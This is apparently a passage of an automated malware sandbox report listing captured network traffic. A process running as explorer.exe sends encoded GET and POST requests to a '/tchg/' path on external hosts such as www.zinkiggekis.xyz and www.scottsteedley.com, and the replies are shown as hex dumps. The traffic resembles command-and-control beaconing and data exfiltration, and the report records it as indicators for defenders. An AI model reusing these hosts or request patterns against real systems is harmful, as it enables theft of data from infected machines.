4c 6d 45 70 66 34 64 57 58 6b 45 58 31 31 58 4f 75 28 53 54 62 52 33 62 6d 6f 4b 61 43 55 58 6f 43 5a 46 39 54 32 33 7a 35 76 66 42 6b 73 52 38 43 67 44 7e 41 73 34 42 59 79 36 41 71 34 43 55 4e 4a 58 6f 77 6f 69 63 37 28 64 56 51 74 57 54 62 30 37 39 30 28 70 30 33 56 49 41 5f 63 67 6a 56 52 4e 78 56 52 6b 6e 62 5a 41 28 42 34 6f 38 62 49 77 47 53 69 32 5a 67 58 4a 30 76 57 62 58 57 45 32 49 4a 6c 4b 4e 6d 76 4f 4d 30 61 4c 73 42 69 7a 30 65 64 6d 74 48 37 30 47 49 57 79 49 69 52 31 46 4a 28 79 6b 4c 63 46 4d 42 49 46 68 33 6b 59 45 31 4b 6b 65 56 33 72 38 35 55 53 4b 65 42 56 78 4e 44 5f 79 67 64 51 38 46 6d 59 67 72 37 58 66 2d 56 65 28 34 46 48 65 4c 50 6b 6f 6e 73 4f 44 52 46 34 53 66 52 4c 52 6c 51 4a 64 79 62 33 68 74 5a 49 46 56 38 55 36 75 7a 66 62 64 36 71 39 38 4e 79 77 56 68 76 6a 51 38 4e 32 36 67 35 46 79 41 37 38 41 32 4c 62 47 48 4b 52 6e 58 59 38 5a 56 70 71 68 32 37 30 5f 43 38 41 4e 66 50 57 45 43 79 47 61 74 36 71 75 76 31 6d 67 35 6c 63 76 4a 30 52 68 6d 31 57 49 4f 73 70 66 61 64 77 65 47 37 47 45 64 57 75 76 77 67 6d 47 4a 76 76 35 42 72 72 5f 7a 56 4a 4a 56 61 6c 70 4b 59 6a 31 75 56 4b 36 62 75 55 74 78 46 31 63 37 45 4a 4f 41 77 63 34 5a 6e 6c 50 46 43 61 51 67 31 50 4d 67 67 45 35 4b 50 49 2d 78 44 52 42 4f 6b 57 49 52 70 43 34 46 36 34 47 62 75 4a 79 69 63 61 63 49 71 46 45 32 5f 65 6b 4e 66 71 30 30 61 58 34 6c 4f 39 4e 76 52 55 67 61 75 78 49 6b 6b 4d 69 42 55 6d 43 62 31 35 4b 6e 52 31 52 7a 35 44 4b 6d 76 75 77 31 34 4f 57 70 59 74 53 55 74 5a 78 63 7a 76 5a 77 57 5a 4c 75 53 68 6f 42 66 4a 6e 68 75 51 61 56 43 66 58 4e 47 4b 30 43 61 4a 2d 6b 63 33 37 41 52 54 52 28 49 70 76 77 6e 56 5a 31 52 65 6c 79 62 4b 62 73 77 50 4c 62 46 66 63 6d 30 47 37 47 4f 57 71 78 51 62 4b 51 77 4e 64 52 46 4f 4a 66 54 63 32 32 68 4b 63 74 44 6c 6b 50 6b 46 42 34 44 39 43 54 47 55 32 4e 6e 32 7a 52 59 68 52 50 47 56 38 67 30 5a 5a 6e 6d 33 76 52 5f 34 37 31 33 74 47 6c 36 35 4c 70 6d 30 74 32 37 4d 6c 43 39 68 70 28 52 7e 6a 56 71 28 77 53 72 32 45 34 6a 32 49 66 37 6a 45 6a 4e 49 53 53 56 4b 34 54 61 37 69 78 44 62 6d 54 6e 62 69 49 49 36 6f 4f 62 37 7a 30 38 59 64 37 71 36 61 46 4e 6a 57 79 6d 6e 75 33 45 79 77 73 35 6a 54 75 7a 67 47 4d 6d 57 5f 31 62 41 4a 36 62 6a 73 62 31 28 31 41 33 6a 53 47 56 28 63 57 64 59 6c 45 6f 52 49 44 71 73 71 58 54 71 68 36 58 32 6c 42 45 7e 69 41 64 76 58 34 4a 6f 43 7a 36 67 4c 46 68 45 4e 37 46 6c 59 6e 63 43 50 6d 67 37 49 6f 6f 57 58 4e 5f 56 4a 59 6b 75 66 4b 34 50 66 4d 54 6f 6e 28 32 58 4c 4c 57 4d 67 6a 41 55 58 44 2d 6f 6e 55 70 65 68 4a 46 69 32 39 6c 36 44 62 6b 59 72 75 61 72 36 62 31 44 35 65 62 43 46 51 72 78 34 5a 53 71 4f 49 42 53 4c 4d 41 76 64 78 61 63 44 6a 73 6b 4d 42 6a 59 67 28 37 51 72 43 32 38 6a 45 53 52 31 4a 62 43 78 6e 4f 4b 45 74 5f 56 65 59 67 69 62 34 79 44 51 7a 65 74 4d 78 52 78 31 76 76 73 55 4a 38 69 44 64 61 42 76 45 62 38 79 55 4f 65 4d 4c 70 38 65 61 54 45 71 39 39 6f 6d 77 41 77 50 51 44 37 54 65 55 70 53 6c 43 55 6e 63 4e 37
                                                                                                                    Data Ascii: O0qEM=rBs9r8r6O9H0hrJvkK0pKLyPoLaIQYAE5KmIfhISK1GuWF0B72gpGICZMFrdOopxFaziHzumi7Tc2TKLwg2mUuwhlBXCAWjtUwWY8lWnXWWQm-BL1zCRqA0fGfBpp1wbXaN-oTcxBbhwdNkR0MeKTdDDY-FIQz870xeAFBsAwAEAtgcEtYSJNL7PViZWmSix0cieLZh91DlFLWUV4L0lpA3MbeQFAANk(UURuI~OOmdZn5L_6fz_tp2OVkjvmhmz35G0cgy9a8XdCNgntAJOKq6zcy(BOJrC2kSmy4bUr9~r7YQ5fkT7~f5cu37bZv(ZdAcrD_BJDUNAkWSUumkPNPQ5CiHS07VbR3oZ63~hHs20d5n7(LmEpf4dWXkEX11XOu(STbR3bmoKaCUXoCZF9T23z5vfBksR8CgD~As4BYy6Aq4CUNJXowoic7(dVQtWTb0790(p03VIA_cgjVRNxVRknbZA(B4o8bIwGSi2ZgXJ0vWbXWE2IJlKNmvOM0aLsBiz0edmtH70GIWyIiR1FJ(ykLcFMBIFh3kYE1KkeV3r85USKeBVxND_ygdQ8FmYgr7Xf-Ve(4FHeLPkonsODRF4SfRLRlQJdyb3htZIFV8U6uzfbd6q98NywVhvjQ8N26g5FyA78A2LbGHKRnXY8ZVpqh270_C8ANfPWECyGat6quv1mg5lcvJ0Rhm1WIOspfadweG7GEdWuvwgmGJvv5Brr_zVJJValpKYj1uVK6buUtxF1c7EJOAwc4ZnlPFCaQg1PMggE5KPI-xDRBOkWIRpC4F64GbuJyicacIqFE2_ekNfq00aX4lO9NvRUgauxIkkMiBUmCb15KnR1Rz5DKmvuw14OWpYtSUtZxczvZwWZLuShoBfJnhuQaVCfXNGK0CaJ-kc37ARTR(IpvwnVZ1RelybKbswPLbFfcm0G7GOWqxQbKQwNdRFOJfTc22hKctDlkPkFB4D9CTGU2Nn2zRYhRPGV8g0ZZnm3vR_4713tGl65Lpm0t27MlC9hp(R~jVq(wSr2E4j2If7jEjNISSVK4Ta7ixDbmTnbiII6oOb7z08Yd7q6aFNjWymnu3Eyws5jTuzgGMmW_1bAJ6bjsb1(1A3jSGV(cWdYlEoRIDqsqXTqh6X2lBE~iAdvX4JoCz6gLFhEN7FlYncCPmg7IooWXN_VJYkufK4PfMTon(2XLLWMgjAUXD-onUpehJFi29l6DbkYruar6b1D5ebCFQrx4ZSqOIBSLMAvdxacDjskMBjYg(7QrC28jESR1JbCxnOKEt_VeYgib4yDQzetMxRx1vvsUJ8iDdaBvEb8yUOeMLp8eaTEq99omwAwPQD7TeUpSlCUncN7ytVGEcMkKi4QiEH4JPPL01pxP7O3GzOLOTJT7xxAHss2DA6aFwQyxBblPq77X54BwGpDJmk7RwSFh8WTXJ0b8(61rG_WenFUR0-5t(rvAQNB5eJIasjMGQuoD8mzASHSni-JTIFdlqBxY1FvUkOgfBwwgoSvhQvS-yEwHTqbqMeNjQjCaycGlNQp9C-shK1iLkB~3IRmKuyEHVAhQUGwpqBr7jwJAUyBWurqahTZeFgPugk4YyI9u(bR6jMw3Ejr3V5URSrQBkoH96LfzzhiPEbjYnNhSG5kgmCTk7fSgfcjeX_K4lD4Lr3(BY7cXEcQbggll24K-TiR-AbOBFYlPPjOV9XzipEQ58UxMKnBF2Nkqepi1(hUxoOpr~NgWaDAsIQAWR_lbv87BOB10WqcHe1HEvV5J9CLDvQ6bf7hnzIFqbNfROuc2GpeAKgn2NsTGM-hn5x~Wmz4VKPaPZ4Ipfj8dI1CZI8ECQ_AOj2DGKJGueiO5ASTr(IcOy6rRzw1vS2iIpZcTppsRy6u2FRemW8dFxD9lMrAuloBgjB5OVvRYRJE5DwgH3uXe4AjpB-bsgI6WCNfiCv30Ok46IspDjzw_VczYWX(jRH1zVltV50SWif5AZi2W1SRdGzeaDGY59v634XLSQAN21K7ktPsE7h2Sr38Z1LyL~XU0za0j7vcZPF1MKln0YNY8XzXyHgIankZV9Rw4tAbyST9c6Axk2Q(HJ3SWh4n6hNYiY9fZDahDewFWc8Vx5Cd02O0AkzYHpX5rnciL5LO3XgF13iBLiMpAKVFvBNoUVXG3i77SmFAGPp9XWd6glm~eK89oZOeShwXNjJqGUYV6TdAEIk8NZtCPnjxJPVUntF4cu_rvBMFtrFk8LFbgKO6G00SYZxUj~-m_5Pe_wacO5tHatcR1vSmbWpxbznElqEhWt6gVMfMtpb9tqvCeZSMtkt8_BdGXYf8ssvd0T_jPEVFLKc9VIOSPGxaE(kzZcpF84YTYplq3Tsef2qRHwOurUUGx9tnCIGPChwJks7i0SfTZNb05CXhLOYHLwbc9cqOwpu5hnDl09ACY2pyREr4lx9AgLJIWeLcAA_bUnApLLCzdVEZqLJjqGs0bo-z48UOrJaPRKcJa6iG5Elf5jYRVnRyyN5foTDfjkycsHUgV1putYNPqzSxaWynuqHx6vjP5By8sSHiA2FKAKDFAZW3VreHfzM19ExGyhIchR-Paho2JbsFXhrknGFHKTYO2SxTOToMOnM8NQprabsyWWRk0qJ6hG8I7eSWMEj~jEiWqd5~oCQkY3kGoliq2G6bKLGBaXeNMpvs42CjwjrUsV5gE6onVl5eaV-HwMJRLwvmPd_yh31y7pFQ-c7oFdeouP9NrEeIHP_cSpZJZY8(apQFLNT9MlSQPacyX731squFy3Xal8MaUX_2oXGK3PKR9Zh6baxJ5bKQkYyy_gDksRw49IsEkpO4RFWDYBHq2iGrqg5DSrrlx6BIDgLdOyzHiEtFGDBQngZVWEUIRuU~t4k4pWc9YJXfD4plAUN9Avn8MeMzh6BaKGgYmTYcvEtEW8991lTgt4dUa3d5f9YjHwH9sXDxQe7zWZZWAOVUrvPV3ntZ_214IMubLtWulLzkUxG47tnOoIniq2NIgpoBUYhBHCSuh49mbgntdKWdNndBJeaodbDtpyxlx7cKB2oDgQSqWmUgwtzedO31J7oWMr_LVIPorhFec(WvjwCLckI(uLQwHZC8C2wzPZhsqWLfTlQG5RceaTc8JH8xIWQ(QTVAqD0NerxooUaVh3Tpe03081BusYaUJOqf4T3SYqibDuZ6jYstYTNgV3cBSmocLN5y64xHYbwm6qklWfCuNVKsOMTk3j3XRRHS0LLGGqc~YawN-vSFis6wjHVZdpuY_C6nvNSeslxedPXLrIEXu6bJOwNO5K3aNeEblCqlwFhrQlR6szPJqMVCp6sA7k5tCaBpICecLMEn6h2TLxrD5fE(5TZfYbh6Viu75TEiXkBxDR1w66dCjZH~G2INRe74U7P5eTIQwPUTER3PNDYiGOFLDIf8kxUGZSXcDmQCxySXGubNQw2Dv7INyoOZRcvysnv2dfJyRl_3Qqzn0VufrR_VHedEzFXygJg~qCoB0ZnCfFvclzko1~mUjpBERp5zbLWiffcPNj_9BF6x4wrxvsss4DYRMcbbhyYc6g6iROt2zWhO74dOP2eTUsWxm5d8YyjKQPPI43bE_lR1JiI89zZqjSKc-DBI8Quzol1I3YBIqpK2mP1h5OTWO(CXWY2vw4YEUS_u8g8IMq2F0zPPFpAQWjDZu3akQgknDJ7eOWnyioY0HuSVCIDb3uKyX~YwjQC6ZiyhTPCJkCyDU10DKu1zWk2M7MOSFHJYnuoSEkvUmsDhzKfDSM5RPl1t61usHCZ3HJ37VPYNj2A4wA3NeA6TM13paSZCQ7kwVPxLRJgdJujijw1sQuYcpJvGFULTojeXPnUkRfXd-1oRz8iKvoJTWxnJvSyDBzHONpfw07A6Aiz5vZWlaAGm-drOX1Mtc5R2fH6ktSMcHvEML9afbXfxT4S4rWXZn4849vc7K6RAzvcFuPe6E5l(PODO7AYRVeeymEgXx3Sjz0gjY49wC5OY62khvDJG3x7Yx9rs3(rn9c1e9JvNZpciWhlZVgvAkFkqFn8GsGKOwUZOikr8eDcELdDzC2tMvJhLMjO~EV8ouUQ
                                                                                                                    May 30, 2023 11:11:08.985214949 CEST1127INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                                                                                                                    May 30, 2023 11:11:08.985399008 CEST1130OUTData Raw: 71 73 61 55 39 74 31 71 32 6f 48 30 62 58 67 6b 43 66 62 47 77 70 54 50 31 6c 61 7e 55 71 72 30 34 70 77 68 37 50 7a 4c 47 53 36 54 43 68 74 46 35 78 37 67 73 7e 48 35 76 31 47 43 6d 31 6b 4d 44 78 69 68 38 63 38 35 58 6b 33 5a 61 33 58 57 30 7e
                                                                                                                    Data Ascii: qsaU9t1q2oH0bXgkCfbGwpTP1la~Uqr04pwh7PzLGS6TChtF5x7gs~H5v1GCm1kMDxih8c85Xk3Za3XW0~_WhPhM-mHTPnWX7zQzyHT8hVl(W6fHxnj8P8sFlyuNzRSRrxOQ5BiMsV_8LlV4PQYLv8w1gRyJ71g7yaG3g7WLBMVysaZz1i_YtEBmRoZVthcX4r_msoh7rxwZkLjtqvNVVxXDbplYB(FjQ7q2WE-dJJYbJmvJzTv
                                                                                                                    May 30, 2023 11:11:08.985579967 CEST1135OUTData Raw: 53 5a 43 73 31 45 54 4d 30 39 53 4a 7a 69 62 78 58 4e 44 69 75 6e 34 30 38 78 53 43 4c 5a 72 6e 4b 45 6a 70 37 41 2d 6a 75 51 30 28 57 50 49 79 38 34 35 54 56 78 2d 43 55 73 65 61 56 62 2d 33 7a 6d 32 6b 43 62 6b 76 69 56 4a 46 43 67 78 57 7a 7e
                                                                                                                    Data Ascii: SZCs1ETM09SJzibxXNDiun408xSCLZrnKEjp7A-juQ0(WPIy845TVx-CUseaVb-3zm2kCbkviVJFCgxWz~u7ptFXlNeTTCiNM0pSI82O30YfjS79PKqUSJGCzQOWXalUrc8Z-QNPep8aLvGOW3wkzYDy-UdXJI82clJhzxvZYQ1Ry3V0AtnjsmRurAUiO1_AXfezEAPSAZnPToFmlwnW6x_tk6WTqs94ahy4XkvsuEbwCzzZ_0s
                                                                                                                    May 30, 2023 11:11:08.986037016 CEST1138OUTData Raw: 30 7a 61 67 56 58 4e 75 56 67 72 47 75 57 72 43 56 71 36 54 6a 6d 32 52 43 4b 43 7a 45 53 4b 68 6a 35 75 45 2d 4f 61 79 64 76 43 4e 58 6a 32 39 73 58 65 33 55 4c 45 43 30 70 6e 45 6f 75 31 7e 70 71 43 37 46 41 37 44 4f 5a 68 5a 39 67 50 54 63 30
                                                                                                                    Data Ascii: 0zagVXNuVgrGuWrCVq6Tjm2RCKCzESKhj5uE-OaydvCNXj29sXe3ULEC0pnEou1~pqC7FA7DOZhZ9gPTc0-EtQFfHrfdM8fDUvnRZHeVin9L4oHuOqNJP0RN6oDrI48FPeKSHNCr9yjWrgb82d_ZYCrTprML1N_bmaHqmJUAn6OcV7GScmn4We2JCIAMd8nhYrjxthd(Zm8yI(Oob45QTs5V3dXWzUjI8y4~ilPhl~Td65S0fZw
                                                                                                                    May 30, 2023 11:11:08.986174107 CEST1150OUTData Raw: 37 6b 6f 74 4d 76 7a 54 45 74 7a 57 36 6a 32 72 48 63 6e 59 77 36 6b 39 4f 6f 74 4c 33 50 65 32 67 74 35 5a 77 78 70 5a 70 54 5a 36 33 72 35 52 77 67 43 70 35 69 33 31 6b 4d 75 6e 42 34 61 32 47 69 71 48 4f 37 4b 72 44 5a 56 42 39 35 2d 73 47 41
                                                                                                                    Data Ascii: 7kotMvzTEtzW6j2rHcnYw6k9OotL3Pe2gt5ZwxpZpTZ63r5RwgCp5i31kMunB4a2GiqHO7KrDZVB95-sGAKQWm_cUAdsYIxqGsMQ0OF0JTz1Bv_(uVZKwUNYVC75NPOMS3MWLoW9BtfzniqriALFbTAaY~mxV4Ek1QT6OXCAtjHSbCJECypb57dxBieVp3RfwoBNat975aBRHzHfyUWS9f4MhVO7Eh39giFJZRZOJ7Ay2aDOlVT
                                                                                                                    May 30, 2023 11:11:09.067985058 CEST1153OUTData Raw: 6e 78 68 5a 52 42 53 7e 30 35 45 67 54 65 74 7e 6e 6a 58 62 74 47 39 74 36 48 54 63 69 56 34 44 51 36 70 6a 34 6a 71 49 67 6a 48 71 34 7a 31 51 53 74 5f 69 37 31 34 4d 75 33 37 78 76 39 4b 73 39 55 54 30 4a 6f 57 68 56 4f 61 39 6a 58 77 4d 47 65
                                                                                                                    Data Ascii: nxhZRBS~05EgTet~njXbtG9t6HTciV4DQ6pj4jqIgjHq4z1QSt_i714Mu37xv9Ks9UT0JoWhVOa9jXwMGe4iQ8NgQL9hTYjaR~DpqF59qZ6qxSHeyfGoR(h0w76zp1E1FQ4vpKI5XZNZLrPsyGTGepusCrZYL5u70VRvfmfaQDozyETtfaXXuXW86VAYHpg3up-ipSOOOgal7dhXy0r0RvuM_p8WJjbhMwBgu3YMsgLL1iJxrJK
                                                                                                                    May 30, 2023 11:11:09.068125963 CEST1156OUTData Raw: 34 64 34 63 56 43 4c 49 58 66 4c 46 47 4b 6c 64 74 28 4c 64 68 6b 4f 61 6d 48 59 69 37 4e 70 7e 36 35 54 62 4c 6a 52 7a 30 34 2d 76 58 7a 5f 53 47 79 5f 51 43 62 69 37 6a 71 52 58 72 6b 4b 78 58 7e 67 74 31 34 66 44 66 43 50 33 5a 51 4a 53 47 67
                                                                                                                    Data Ascii: 4d4cVCLIXfLFGKldt(LdhkOamHYi7Np~65TbLjRz04-vXz_SGy_QCbi7jqRXrkKxX~gt14fDfCP3ZQJSGg11F8ZAmcEHL9CGBhcAeU7qtf2~58Bd_Y6jjCnbXilmAQXPbhsl9q84DIOg1IXFFfnna6QxAsBrDhL4e9V(aFvCLti4oTt9TmwqPhEue7t3o4-ci3Unh(jJUO4N-thVK6Xp-Fa2F(BaqqCXi9EQ6PtgeqNRpTxdqmk
                                                                                                                    May 30, 2023 11:11:09.068396091 CEST1157OUTData Raw: 38 34 68 42 61 68 59 4f 7a 34 73 6b 6a 64 35 4f 46 59 4b 79 39 34 6d 6f 51 52 6b 44 44 4a 31 74 36 70 41 50 69 4d 38 52 63 4c 56 4f 72 6a 6f 53 6c 54 70 48 4e 6e 2d 58 4c 32 6a 6d 32 55 34 6b 70 53 4a 6a 31 7e 41 79 6e 64 44 35 65 54 44 57 53 78
                                                                                                                    Data Ascii: 84hBahYOz4skjd5OFYKy94moQRkDDJ1t6pAPiM8RcLVOrjoSlTpHNn-XL2jm2U4kpSJj1~AyndD5eTDWSxiRzi2j8leLEJjR7y-BJQwZiMa~LWl(HZvxofVWvQAGH0bZC5IrnkNTipaXQP21lCrAjdsbTCX1QDmPhAeuJ4JloUSeQI5Ep9QeXY8DTo2GIF5I1xP2FkIPsUg2kanl_eFyNfSyvTp1nnkS3c4(7FB(_50pUnEhKkl
                                                                                                                    May 30, 2023 11:11:09.068573952 CEST1167OUTData Raw: 31 4a 2d 31 70 6b 63 79 31 65 7a 6e 45 32 63 6f 71 55 33 32 2d 67 6b 34 4e 6c 4f 52 4a 67 7a 45 69 6c 72 69 5a 32 64 71 42 65 4f 65 32 41 67 5a 4e 6b 64 49 75 28 76 6b 5f 39 48 63 31 73 39 58 44 45 73 61 79 68 69 69 51 35 79 70 6a 72 2d 62 2d 6a
                                                                                                                    Data Ascii: 1J-1pkcy1eznE2coqU32-gk4NlORJgzEilriZ2dqBeOe2AgZNkdIu(vk_9Hc1s9XDEsayhiiQ5ypjr-b-jXYtbNVl80gH14KHftE4D6rp4FVXeE7uHf~1ZvkY(CoHabgcIh8Wk82SYm4hd9FySqPtZ1LTrKNy7QoIg0go3u(JEPvcGtac9bC3Os(PN2Xrg6(yWw4af920kyJCboEknbSU4i7YWo~JIYHUGFiUiJO9dbHfKtXpaC


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    58192.168.11.2049817109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:11.513123989 CEST1168OUTGET /tchg/?O0qEM=mDEdoIjvGdDKka9ru4QwK/GisJWxY9EIyNGATwE/O1GDb08I/XgAMo6lLUTyBtJ+E+b+Hhq9pNT1+wqS6RrKc+0XnVP7aUjPVQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.zinkiggekis.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:11:11.591511965 CEST1168INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:11 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    59192.168.11.2049818162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:17.198364973 CEST1169OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.scottsteedley.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.scottsteedley.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 31 77 6a 2d 6a 75 6a 56 6a 53 28 36 31 56 32 70 47 69 61 49 30 63 61 47 35 41 4f 56 47 58 35 68 5a 7a 32 59 41 79 61 6d 59 78 41 35 72 6b 46 79 36 6f 4f 68 4f 65 55 69 43 74 4b 59 4e 6a 4f 63 56 62 58 5f 4f 36 45 38 6f 4f 50 4f 28 33 69 4d 33 6b 6e 74 42 62 53 43 42 4b 55 36 79 34 39 6a 48 31 44 53 66 44 33 49 7a 59 69 4b 77 48 46 4b 47 67 62 46 62 4b 7e 71 49 51 38 58 31 4e 56 47 65 70 72 58 37 4b 76 64 53 39 48 41 69 55 67 48 39 4f 64 67 6b 52 30 39 4e 41 53 6f 58 6a 6c 65 4d 55 58 78 37 30 4d 65 56 6c 59 6d 46 37 50 55 77 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=1wj-jujVjS(61V2pGiaI0caG5AOVGX5hZz2YAyamYxA5rkFy6oOhOeUiCtKYNjOcVbX_O6E8oOPO(3iM3kntBbSCBKU6y49jH1DSfD3IzYiKwHFKGgbFbK~qIQ8X1NVGeprX7KvdS9HAiUgH9OdgkR09NASoXjleMUXx70MeVlYmF7PUwg).
                                                                                                                    May 30, 2023 11:11:17.366872072 CEST1171INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:11:16 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 